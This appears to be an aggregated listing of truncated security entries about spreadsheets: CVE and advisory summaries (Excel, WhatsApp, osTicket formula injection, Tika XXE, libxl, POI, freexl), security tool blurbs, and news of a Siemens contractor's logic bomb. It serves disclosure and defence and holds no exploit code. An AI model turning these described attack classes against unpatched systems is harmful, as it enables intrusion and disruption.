Cypheroth - Automated, Extensible Toolset That Runs Cypher Queries Against Bloodhound's Neo4j Backend And Saves Output To Spreadsheets

Automated, extensible toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets. Description This is a bash script that automates running cypher queries against Bloodhound data stored in a Neo4j database. I found myself re-running the same queries throug...

PT-2021-2274 · Microsoft · Office Excel

Name of the Vulnerable Software and Affected Versions: Microsoft Excel affected versions not specified Description: The issue is related to incorrect code generation management in Microsoft Excel. It allows a remote attacker to execute arbitrary code. The vulnerability can be exploited through th...

PT-2021-2035 · Microsoft · Office Web Apps Server +4

Name of the Vulnerable Software and Affected Versions: Microsoft Excel affected versions not specified Microsoft Office affected versions not specified Microsoft 365 Apps for Enterprise affected versions not specified Microsoft Office Web Apps Server affected versions not specified Microsoft Offi...

Facebook WhatsApp Path Traversal Vulnerability

Facebook WhatsApp is a suite of mobile applications from Facebook Inc. in the United States that use the Internet to send text messages. The application uses the contact information in a smartphone to find contacts using the program to send texts, pictures, etc. WhatsApp Business is the commercia...

CVE-2020-1904

A path validation issue in WhatsApp for iOS prior to v2.20.61 and WhatsApp Business for iOS prior to v2.20.61 could have allowed for directory traversal overwriting files when sending specially crafted docx, xlsx, and pptx files as attachments to messages...

Microsoft Overhauls ‘Patch Tuesday’ Security Update Guide

Microsoft has updated its Security Update Guide, which is used by tens of millions of cybersecurity professionals the second Tuesday of every month, also known as Patch Tuesday. The update, according to Microsoft, is meant to deliver a more intuitive user experience. For its latest update,...

CVE-2019-14749

An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. CSV aka Formula injection exists in the export spreadsheets functionality. These spreadsheets are generated dynamically from unvalidated or unfiltered user input in the Name and Internal Notes fields in the Users tab, and...

CVE-2019-14749

An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. CSV aka Formula injection exists in the export spreadsheets functionality. These spreadsheets are generated dynamically from unvalidated or unfiltered user input in the Name and Internal Notes fields in the Users tab, and...

Design/Logic Flaw

An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. CSV aka Formula injection exists in the export spreadsheets functionality. These spreadsheets are generated dynamically from unvalidated or unfiltered user input in the Name and Internal Notes fields in the Users tab, and...

CVE-2019-14749

An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. CSV aka Formula injection exists in the export spreadsheets functionality. These spreadsheets are generated dynamically from unvalidated or unfiltered user input in the Name and Internal Notes fields in the Users tab, and...

Insider Logic Bombs

Add to the "not very smart criminals" file: According to court documents, Tinley provided software services for Siemens' Monroeville, PA offices for nearly ten years. Among the work he was asked to perform was the creation of spreadsheets that the company was using to manage equipment orders. The...

Siemens Contractor Pleads Guilty to Planting 'Logic Bomb' in Spreadsheets

A former Siemens contractor has pledged guilty in federal court Friday to secretly planting code in automated spreadsheets he had created for the company over a decade ago that deliberately crashes the program every few years. David Tinley, a 62-year-old resident of Harrison City, Pennsylvania, w...

Siemens Contractor Pleads Guilty to Planting 'Logic Bomb' in Spreadsheets

A former Siemens contractor has pledged guilty in federal court Friday to secretly planting code in automated spreadsheets he had created for the company over a decade ago that deliberately crashes the program every few years. David Tinley, a 62-year-old resident of Harrison City, Pennsylvania, w...

Hostintel - A Modular Python Application To Collect Intelligence For Malicious Hosts

This tool is used to collect various intelligence sources for hosts. Hostintel is written in a modular fashion so new intelligence sources can be easily added. Hosts are identified by FQDN host name, Domain, or IP address. This tool only supports IPv4 at the moment. The output is in CSV format an...

GHSA-4XR4-4C65-HJ7F Apache Tika does not properly initialize the XML parser or choose handlers

Apache Tika before 1.13 does not properly initialize the XML parser or choose handlers, which might allow remote attackers to conduct XML External Entity XXE attacks via vectors involving 1 spreadsheets in OOXML files and 2 XMP metadata in PDF and other file formats, a related issue to...

Open-Xchange (OX) App Suite Path Traversal Vulnerability (Jun 2018)

Open-Xchange OX App Suite is prone to a path traversal vulnerability. Copyright C 2018 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free...

CVE-2016-10585

libxl provides Node bindings for the libxl library for reading and writing excel XLS and XLSX spreadsheets. libxl downloads zipped resources over HTTP, which leaves it vulnerable to MITM attacks. It may be possible to cause remote code execution RCE by swapping out the requested zip file with an...

CVE-2016-10585

CVE-2016-10585 affects libxl bindings for Node.js. The library downloads zipped resources over HTTP, enabling MITM attacks that could allow an attacker in a privileged network position to swap the downloaded zip with a malicious one, potentially causing remote code execution on the host running l...

poi: Parsing of multiple file types can cause a denial of service via infinite loop or out of memory exception

Apache POI in versions prior to release 3.17 are vulnerable to Denial of Service Attacks: 1 Infinite Loops while parsing crafted WMF, EMF, MSG and macros POI bugs 61338 and 61294, and 2 Out of Memory Exceptions while parsing crafted DOC, PPT and XLS POI bugs 52372 and 61295...

Debian DSA-4129-1 : freexl - security update

Multiple heap buffer over reads were discovered in freexl, a library to read Microsoft Excel spreadsheets, which could result in denial of service. C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from Debian Security Advisory DSA-4129. The te...